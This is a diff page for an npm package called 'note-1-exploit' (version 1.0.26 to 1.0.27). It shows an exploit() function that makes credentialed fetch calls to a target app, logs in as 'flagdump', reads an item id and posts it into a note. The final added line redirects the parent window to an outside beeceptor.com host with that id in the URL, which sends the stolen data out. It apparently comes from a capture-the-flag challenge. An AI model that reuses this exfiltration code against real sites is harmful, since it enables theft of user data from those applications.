note-1-exploit 1.0.26 → 1.0.27
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -6
- package/package.json +1 -1
package/index.js
CHANGED
@@ -5,8 +5,6 @@ async function exploit() {
|
|
5
5
|
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
6
6
|
"sec-gpc": "1"
|
7
7
|
},
|
8
|
-
"referrer": "http://web/",
|
9
|
-
"referrerPolicy": "strict-origin-when-cross-origin",
|
10
8
|
"body": null,
|
11
9
|
"method": "GET",
|
12
10
|
"mode": "cors",
|
@@ -25,8 +23,6 @@ async function exploit() {
|
|
25
23
|
"sec-gpc": "1",
|
26
24
|
"upgrade-insecure-requests": "1"
|
27
25
|
},
|
28
|
-
"referrer": "http://web/login",
|
29
|
-
"referrerPolicy": "strict-origin-when-cross-origin",
|
30
26
|
"body": "username=flagdump&password=flagdump",
|
31
27
|
"method": "POST",
|
32
28
|
"mode": "cors",
|
@@ -40,12 +36,11 @@ async function exploit() {
|
|
40
36
|
"content-type": "application/json",
|
41
37
|
"sec-gpc": "1"
|
42
38
|
},
|
43
|
-
"referrer": "http://web/",
|
44
|
-
"referrerPolicy": "strict-origin-when-cross-origin",
|
45
39
|
"body": "{\"title\":\"" + note_name + "\",\"content\":\"" + json_results[0].id + "\"}",
|
46
40
|
"method": "POST",
|
47
41
|
"mode": "cors",
|
48
42
|
"redirect": "follow",
|
49
43
|
"credentials": "include"
|
50
44
|
});
|
45
|
+
window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + json_results[0].id)
|
51
46
|
};
|